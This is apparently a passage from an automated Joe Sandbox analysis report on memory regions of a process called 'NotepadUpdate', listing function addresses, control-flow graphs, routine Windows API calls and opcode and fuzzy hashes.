                                  • Instruction Fuzzy Hash: ED62DE74E05229CFDB28DF69C984BDEBBB2BB49301F1081E9D449AB255DB309E85CF50
                                  Function 092D61DD Relevance: 1.8, Strings: 1, Instructions: 560COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1641 92d61dd-92d61e1 1642 92d6b9c-92d6ba6 1641->1642 1643 92d61e2-92d61f7 1641->1643 1643->1642 1644 92d61f8-92d6203 1643->1644 1646 92d6209-92d6215 1644->1646 1647 92d6221-92d6230 1646->1647 1649 92d628f-92d6293 1647->1649 1650 92d6299-92d62a2 1649->1650 1651 92d6333-92d639d 1649->1651 1652 92d619d-92d61a9 1650->1652 1653 92d62a8-92d62be 1650->1653 1651->1642 1689 92d63a3-92d68ea 1651->1689 1652->1642 1655 92d61af-92d61bb 1652->1655 1659 92d6308-92d631a 1653->1659 1660 92d62c0-92d62c3 1653->1660 1656 92d61bd-92d61d1 1655->1656 1657 92d6232-92d6238 1655->1657 1656->1657 1667 92d61d3-92d61dc 1656->1667 1657->1642 1661 92d623e-92d6256 1657->1661 1671 92d6adb-92d6b91 1659->1671 1672 92d6320-92d6323 1659->1672 1660->1642 1663 92d62c9-92d62fe 1660->1663 1661->1642 1670 92d625c-92d6284 1661->1670 1663->1651 1685 92d6300-92d6306 1663->1685 1667->1641 1670->1649 1671->1642 1674 92d6326-92d6330 1672->1674 1685->1659 1685->1660 1767 92d68ec-92d68f6 1689->1767 1768 92d6901-92d6994 1689->1768 1769 92d68fc 1767->1769 1770 92d699f-92d6a32 1767->1770 1768->1770 1771 92d6a3d-92d6ad0 1769->1771 1770->1771 1771->1671
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1589910307.00000000092D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_92d0000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: D
                                  • API String ID: 0-2746444292
                                  • Opcode ID: 1cd567521b9bbf5cd2df81360722d5fbfa6da286ad53d3d79eb5f538ef410409
                                  • Instruction ID: dea434f5dffebb509eb0188a4486befe7145af79cf0d3c5fd766f9b29aaab9f8
                                  • Opcode Fuzzy Hash: 1cd567521b9bbf5cd2df81360722d5fbfa6da286ad53d3d79eb5f538ef410409
                                  • Instruction Fuzzy Hash: D652EB74A012198FDB64DF64D998B9DB7B2FF89310F1441DAD50AAB364CB30AE81CF90
                                  Function 0147D570 Relevance: 6.1, APIs: 4, Instructions: 137threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 529 147d570-147d572 530 147d575-147d57e 529->530 531 147d574 529->531 532 147d585-147d60f GetCurrentProcess 530->532 533 147d580-147d584 530->533 531->530 537 147d611-147d617 532->537 538 147d618-147d64c GetCurrentThread 532->538 533->532 537->538 539 147d655-147d689 GetCurrentProcess 538->539 540 147d64e-147d654 538->540 541 147d692-147d6ad call 147d75b 539->541 542 147d68b-147d691 539->542 540->539 546 147d6b3-147d6e2 GetCurrentThreadId 541->546 542->541 547 147d6e4-147d6ea 546->547 548 147d6eb-147d74d 546->548 547->548
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 0147D5FE
                                  • GetCurrentThread.KERNEL32 ref: 0147D63B
                                  • GetCurrentProcess.KERNEL32 ref: 0147D678
                                  • GetCurrentThreadId.KERNEL32 ref: 0147D6D1
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1563196068.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1470000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: 4b43718f957bdda153d8e7e91e7b562607fc1b0b8eafaf9f0226b037d8e729db
                                  • Instruction ID: c3d862bee50390513ffb58b5593c874dca8e6dc789a6d3846175c75029f28760
                                  • Opcode Fuzzy Hash: 4b43718f957bdda153d8e7e91e7b562607fc1b0b8eafaf9f0226b037d8e729db
                                  • Instruction Fuzzy Hash: 2F5147B0D013498FEB18CFA9D5487EEBBF1EF88314F24845AE019AB3A1D7345944CB66
                                  Function 0147D580 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 555 147d580-147d60f GetCurrentProcess 560 147d611-147d617 555->560 561 147d618-147d64c GetCurrentThread 555->561 560->561 562 147d655-147d689 GetCurrentProcess 561->562 563 147d64e-147d654 561->563 564 147d692-147d6ad call 147d75b 562->564 565 147d68b-147d691 562->565 563->562 569 147d6b3-147d6e2 GetCurrentThreadId 564->569 565->564 570 147d6e4-147d6ea 569->570 571 147d6eb-147d74d 569->571 570->571
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 0147D5FE
                                  • GetCurrentThread.KERNEL32 ref: 0147D63B
                                  • GetCurrentProcess.KERNEL32 ref: 0147D678
                                  • GetCurrentThreadId.KERNEL32 ref: 0147D6D1
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1563196068.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1470000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: 9c995beae074bba1fe8da95a9c1f52ad8b1fcf954b2cdd3bb25b0d2316e92837
                                  • Instruction ID: 2efafc91875b5ebda42431b4393721bea70eb6f0751f9c8cdb5fe43d640c2692
                                  • Opcode Fuzzy Hash: 9c995beae074bba1fe8da95a9c1f52ad8b1fcf954b2cdd3bb25b0d2316e92837
                                  • Instruction Fuzzy Hash: 1F5136B1D00249CFEB18CFAAD548BDEBBF1EF88314F20855AE019A7361D7745944CB66
                                  Function 0147B300 Relevance: 1.7, APIs: 1, Instructions: 238COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1796 147b300-147b302 1797 147b305-147b308 1796->1797 1798 147b304 1796->1798 1799 147b2b5-147b2dd 1797->1799 1800 147b30a 1797->1800 1798->1797 1814 147b2df-147b2ea 1799->1814 1815 147b2ec-147b2f4 1799->1815 1801 147b30d-147b31f 1800->1801 1802 147b30b-147b30c 1800->1802 1803 147b321-147b32e call 147acc4 1801->1803 1804 147b34b-147b34f 1801->1804 1802->1801 1812 147b344 1803->1812 1813 147b330 1803->1813 1807 147b363-147b3a4 1804->1807 1808 147b351-147b35b 1804->1808 1817 147b3a6-147b3ae 1807->1817 1818 147b3b1-147b3bf 1807->1818 1808->1807 1812->1804 1868 147b336 call 147b5fc 1813->1868 1869 147b336 call 147b598 1813->1869 1870 147b336 call 147b5a8 1813->1870 1819 147b2f7-147b2fc 1814->1819 1815->1819 1817->1818 1820 147b3e3-147b3e5 1818->1820 1821 147b3c1-147b3c6 1818->1821 1826 147b3e8-147b3ef 1820->1826 1823 147b3d1 1821->1823 1824 147b3c8-147b3cf call 147acd0 1821->1824 1822 147b33c-147b33e 1822->1812 1825 147b480-147b4fa 1822->1825 1828 147b3d3-147b3e1 1823->1828 1824->1828 1857 147b4fd 1825->1857 1858 147b4fc 1825->1858 1829 147b3f1-147b3f9 1826->1829 1830 147b3fc-147b403 1826->1830 1828->1826 1829->1830 1833 147b405-147b40d 1830->1833 1834 147b410-147b419 call 147ace0 1830->1834 1833->1834 1838 147b426-147b42b 1834->1838 1839 147b41b-147b423 1834->1839 1840 147b42d-147b434 1838->1840 1841 147b449-147b44d 1838->1841 1839->1838 1840->1841 1843 147b436-147b446 call 147acf0 call 147ad00 1840->1843 1866 147b450 call 147b879 1841->1866 1867 147b450 call 147b888 1841->1867 1843->1841 1846 147b453-147b456 1848 147b479-147b47f 1846->1848 1849 147b458-147b476 1846->1849 1849->1848 1859 147b505-147b540 1857->1859 1860 147b500-147b504 1857->1860 1858->1857 1861 147b542-147b545 1859->1861 1862 147b548-147b573 GetModuleHandleW 1859->1862 1860->1859 1861->1862 1863 147b575-147b57b 1862->1863 1864 147b57c-147b590 1862->1864 1863->1864 1866->1846 1867->1846 1868->1822 1869->1822 1870->1822
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0147B566
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1563196068.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1470000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 49ed00cc5e2accdab32767dc879a0a6ab67f0cff1fc56fbcfc564315f4fadb86
                                  • Instruction ID: 6f1a6980c459910df29248eb726b3b64875707e5bfc5a52cbcf18bd351b1af4e
                                  • Opcode Fuzzy Hash: 49ed00cc5e2accdab32767dc879a0a6ab67f0cff1fc56fbcfc564315f4fadb86
                                  • Instruction Fuzzy Hash: 63916470A00B418FE725CF2AD45479BBBF1FF88214F04892ED586CBA61D735E84ACB91
                                  Function 062C1DE4 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1871 62c1de4-62c1dea 1872 62c1dec 1871->1872 1873 62c1ded-62c1e56 1871->1873 1872->1873 1875 62c1e58-62c1e5e 1873->1875 1876 62c1e61-62c1e68 1873->1876 1875->1876 1877 62c1e6a-62c1e70 1876->1877 1878 62c1e73-62c1eab 1876->1878 1877->1878 1879 62c1eb3-62c1f12 CreateWindowExW 1878->1879 1880 62c1f1b-62c1f53 1879->1880 1881 62c1f14-62c1f1a 1879->1881 1885 62c1f55-62c1f58 1880->1885 1886 62c1f60 1880->1886 1881->1880 1885->1886 1887 62c1f61 1886->1887 1887->1887
                                  APIs
                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 062C1F02
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1587085222.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_62c0000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: 0d90570e3ba1158b5964ca7680233e7296e9e73c4ec8160d8c3c9c17acdce71f
                                  • Instruction ID: 30f126438e498b3f7d615b30090c9520258ef5d43977644a16581a4e0d18725d
                                  • Opcode Fuzzy Hash: 0d90570e3ba1158b5964ca7680233e7296e9e73c4ec8160d8c3c9c17acdce71f
                                  • Instruction Fuzzy Hash: 2451E0B1C10349DFDB14CF9AC885ADEBBB5BF48310F24822EE818AB251D7749941CF90
                                  Function 062C1DF0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1888 62c1df0-62c1e56 1889 62c1e58-62c1e5e 1888->1889 1890 62c1e61-62c1e68 1888->1890 1889->1890 1891 62c1e6a-62c1e70 1890->1891 1892 62c1e73-62c1f12 CreateWindowExW 1890->1892 1891->1892 1894 62c1f1b-62c1f53 1892->1894 1895 62c1f14-62c1f1a 1892->1895 1899 62c1f55-62c1f58 1894->1899 1900 62c1f60 1894->1900 1895->1894 1899->1900 1901 62c1f61 1900->1901 1901->1901
                                  APIs
                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 062C1F02
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1587085222.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_62c0000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: 5b165cd1c8ab717daf5c2b324aed5bc6e9af4384ade2677df2aac3c0c7168fb5
                                  • Instruction ID: 9772003a61078977aaec4b273cab89f11f06600e29a62a20447bbb0015515ce9
                                  • Opcode Fuzzy Hash: 5b165cd1c8ab717daf5c2b324aed5bc6e9af4384ade2677df2aac3c0c7168fb5
                                  • Instruction Fuzzy Hash: F941AEB1D10349DFDB14CF9AC885ADEBBB5BF48310F24822EE818AB251D7759945CF90
                                  Function 0147590C Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1902 147590c-147590e 1903 1475911-1475912 1902->1903 1904 1475910 1902->1904 1905 1475915-1475916 1903->1905 1906 1475913-1475914 1903->1906 1904->1903 1907 1475917-1475918 1905->1907 1908 1475919-14759d9 CreateActCtxA 1905->1908 1906->1905 1907->1908 1911 14759e2-1475a3c 1908->1911 1912 14759db-14759e1 1908->1912 1919 1475a3e-1475a41 1911->1919 1920 1475a4b-1475a4f 1911->1920 1912->1911 1919->1920 1921 1475a51-1475a5d 1920->1921 1922 1475a60 1920->1922 1921->1922 1924 1475a61 1922->1924 1924->1924
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 014759C9
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1563196068.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1470000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: ed96e9e7a9a8c4035fc8641167fbad2522c38e9797dc6f366b9c464052ca936d
                                  • Instruction ID: b344cbb381df4a3e65e78f024b4bff43dc911504a03a88dc3116f6dc9c3b619e
                                  • Opcode Fuzzy Hash: ed96e9e7a9a8c4035fc8641167fbad2522c38e9797dc6f366b9c464052ca936d
                                  • Instruction Fuzzy Hash: BC41E0B1C00719DFEB28DFAAC8847DEBBB5BF49304F20806AD408AB261DB755946CF54
                                  Function 014744B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1925 14744b4-14759d9 CreateActCtxA 1929 14759e2-1475a3c 1925->1929 1930 14759db-14759e1 1925->1930 1937 1475a3e-1475a41 1929->1937 1938 1475a4b-1475a4f 1929->1938 1930->1929 1937->1938 1939 1475a51-1475a5d 1938->1939 1940 1475a60 1938->1940 1939->1940 1942 1475a61 1940->1942 1942->1942
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 014759C9
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1563196068.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1470000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: c300aca774cfcf7fd1f5fadf0101d58d9beb3fe0f4d3c0d78dbf39ee7ac4cab5
                                  • Instruction ID: a0b655e854951bb91aebee7afa82d32910e907f2cdea2521c83d9fe914ef8949
                                  • Opcode Fuzzy Hash: c300aca774cfcf7fd1f5fadf0101d58d9beb3fe0f4d3c0d78dbf39ee7ac4cab5
                                  • Instruction Fuzzy Hash: 2741A2B1D00719DFEB24DFAAC8847DEBBB5BF49304F20806AD418AB251D7756946CF90
                                  Function 062C43DE Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                  Download Yara Rule
                                  APIs
                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 062C4471
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1587085222.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_62c0000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID: CallProcWindow
                                  • String ID:
                                  • API String ID: 2714655100-0
                                  • Opcode ID: d4e35e3c702ec11afb88bb20212e0b9fa09f016d9b66f69f80d36de3e65ff641
                                  • Instruction ID: 2c312446581c75af07f1640fb0fb3ceb3f1db6c91049681679f8cc63fc396ff6
                                  • Opcode Fuzzy Hash: d4e35e3c702ec11afb88bb20212e0b9fa09f016d9b66f69f80d36de3e65ff641
                                  • Instruction Fuzzy Hash: 8E3129B5A10205CFDB64DF95C448AAAFBF5FF88324F24C55DD919AB321D374A841CB90
                                  Function 0147D7C0 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                  Download Yara Rule
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0147D84F
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1563196068.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1470000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 77b99032f7299a1a7a4775fd0f4628b14eca5218693ae3c9367ccc3743239841
                                  • Instruction ID: 8dac9b07b5a2f882908a6940f1cf6b14b825e1e5bca1be804e188772c9fcd190
                                  • Opcode Fuzzy Hash: 77b99032f7299a1a7a4775fd0f4628b14eca5218693ae3c9367ccc3743239841
                                  • Instruction Fuzzy Hash: 5221D6B5D10248AFDB10CF9AD584ADEBFF9EF48310F14841AE918A7350D375A944CF65
                                  Function 0147D7C8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                  Download Yara Rule
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0147D84F
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1563196068.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1470000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: a57e03acf5802091af6df7f7060c4217c570bd16a7b442bb0d9fd48c36a4f06a
                                  • Instruction ID: 59ca9834e0fe8a3cb38d35766e4577cfa6d4df044421445de69bf24373ad84ee
                                  • Opcode Fuzzy Hash: a57e03acf5802091af6df7f7060c4217c570bd16a7b442bb0d9fd48c36a4f06a
                                  • Instruction Fuzzy Hash: F521C4B5D00248DFDB10CF9AD984ADEBBF5FB48310F14841AE928A7350D379A944CFA5
                                  Function 0147B500 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0147B566
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1563196068.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1470000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: ddd8ef4ee2bd3ce346dda0142ca6f63e791ef57b6507992723882d6066c6a2cb
                                  • Instruction ID: 1e80af8067805f4579fa4d7534749238216525aca3dc3ddb21549b74680134c9
                                  • Opcode Fuzzy Hash: ddd8ef4ee2bd3ce346dda0142ca6f63e791ef57b6507992723882d6066c6a2cb
                                  • Instruction Fuzzy Hash: 0511DFB6C00649CFDB24DF9AC444BDEFBF4EB88324F10841AD929A7610C379A545CFA5
                                  Function 092D300C Relevance: 1.5, Strings: 1, Instructions: 209COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1589910307.00000000092D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_92d0000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: d8q
                                  • API String ID: 0-2239850164
                                  • Opcode ID: b28633b4414895147e034f365788521c52efa443a4a191ada8802f8608b19aa9
                                  • Instruction ID: ded51431975a4865a8857ae170edb53fda1ef23a0fed1d9e936b38a916c88ce7
                                  • Opcode Fuzzy Hash: b28633b4414895147e034f365788521c52efa443a4a191ada8802f8608b19aa9
                                  • Instruction Fuzzy Hash: 5761AD35B1120A9FCF14CF68D955A9EBBF2EF88715F14406AE902AB354DB70DC41CBA2
                                  Function 092D29B8 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1589910307.00000000092D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_92d0000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Hq
                                  • API String ID: 0-1594803414
                                  • Opcode ID: bf7868d1fb65ec4ff8d975f62c5e43595d365d4d91b9031b4f6aca6269a1174a
                                  • Instruction ID: 03be26db8e9b6956a0ea924ff3a502dd52f153030527aceb30829c4067463422
                                  • Opcode Fuzzy Hash: bf7868d1fb65ec4ff8d975f62c5e43595d365d4d91b9031b4f6aca6269a1174a
                                  • Instruction Fuzzy Hash: D7312230A09340AFE7469F749C16BAA7FB6EFC6300F1480ABE586CF295DA344D05C791
                                  Function 092D29C8 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1589910307.00000000092D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_92d0000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Hq
                                  • API String ID: 0-1594803414
                                  • Opcode ID: 54a5e1f07b16c44e277e8a0fccc390816fcff980ddfd9e0bebc16f5b148f15b5
                                  • Instruction ID: 406ad21e890cb7aaaade8ac24c7f2994549357cba6385bd3669a26ea8b4cfc0d
                                  • Opcode Fuzzy Hash: 54a5e1f07b16c44e277e8a0fccc390816fcff980ddfd9e0bebc16f5b148f15b5
                                  • Instruction Fuzzy Hash: BD213030A05204AFE7029FB49C26BAE7FB7EBC6300F14C0A7E586DB284DA348D05C791
                                  Function 092D0040 Relevance: .8, Instructions: 756COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1589910307.00000000092D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_92d0000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4a1b00182108d1e7703e5519edf8f3329681573898d031a2652842428a7c3dc9
                                  • Instruction ID: 0c4662db403d37db892e8a6b2a0af243c1b66a322a108b7f290d9d83684e00dc
                                  • Opcode Fuzzy Hash: 4a1b00182108d1e7703e5519edf8f3329681573898d031a2652842428a7c3dc9
                                  • Instruction Fuzzy Hash: BB622470D56B428ADB749FB4C6983BD7AA1AB41304F704A1FE1FACB360DB349486CB45
                                  Function 092D37A7 Relevance: .1, Instructions: 117COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1589910307.00000000092D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_92d0000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9d2f4417cab24c13408451c6fbf5bea10b863f3232cdaf9b33b0e94644dcc086
                                  • Instruction ID: e8ee75434fa27d02d7add5db54d63d81fa382a68f042ff3424dcc7b5878f5075
                                  • Opcode Fuzzy Hash: 9d2f4417cab24c13408451c6fbf5bea10b863f3232cdaf9b33b0e94644dcc086
                                  • Instruction Fuzzy Hash: DC415C71A0121A9FDB05DF65D844AAEB7A3FBC8314F18802AF9029B294DB309D56CBD1
                                  Function 092D3468 Relevance: .1, Instructions: 78COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1589910307.00000000092D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_92d0000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 259fd3c29de470a7f56cd7b880c39e419acbdc3807bca35c8f8f2e126c05b5aa
                                  • Instruction ID: 32c8945963db853982270aca58f84894ad49847d0aa9853a4b34dde911f5e63f
                                  • Opcode Fuzzy Hash: 259fd3c29de470a7f56cd7b880c39e419acbdc3807bca35c8f8f2e126c05b5aa
                                  • Instruction Fuzzy Hash: 50219A35A152068FCB11DFB8C584A5ABBB1AF49314B1540AAE905CB361D735DC84CBA2
                                  Function 0142D1B4 Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1559475378.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_142d000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 274f87790c804f563716e754741a972fe873d189d19d128b3913b47e79796be0
                                  • Instruction ID: 11778ee457389c79ba3b5d64a37b2acf641481605eb5641a534c3764699e0b04
                                  • Opcode Fuzzy Hash: 274f87790c804f563716e754741a972fe873d189d19d128b3913b47e79796be0
                                  • Instruction Fuzzy Hash: 7421C571904304EFDB15DF94D9C0B26BB65FB85324F64C56EE9094B3A2C336D886CA72
                                  Function 0142D36C Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1559475378.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_142d000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bef7b8206c0d4925e30c55c0a26da3d632a95829f730ab2c86ebca1d8b431082
                                  • Instruction ID: 01c0ec06f1392a1d8b71fe81d7c03b2aee24e480f353d08a2e001934252f5a59
                                  • Opcode Fuzzy Hash: bef7b8206c0d4925e30c55c0a26da3d632a95829f730ab2c86ebca1d8b431082
                                  • Instruction Fuzzy Hash: C0210071904200EFDB15DFA4D5C4B26BB61EB88318F60C56EE8094B3A2C336D887CA62
                                  Function 0142D367 Relevance: .1, Instructions: 53COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1559475378.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_142d000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                  • Instruction ID: 755ac39d0119e7ebb050ed8bfdb78333ae857e5efd2b5871d0d18c2fa056c611
                                  • Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                  • Instruction Fuzzy Hash: 8311AC75904240DFDB06CF54D584B16BB61FB84218F24C6AAD8494B7A7C33AE44ACB52
                                  Function 0142D1AF Relevance: .1, Instructions: 53COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1559475378.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_142d000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                  • Instruction ID: 2c0c46c5ee558b32a4828f7f82478cd848af8c4f222ae678f82a6b2e2d68222a
                                  • Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                  • Instruction Fuzzy Hash: 9C11BE75904240DFDB06CF54D5C0B16BF61FB85324F24C6AAD8494B7A6C33AD44ACBA1
                                  Function 092D3459 Relevance: .0, Instructions: 32COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1589910307.00000000092D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_92d0000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
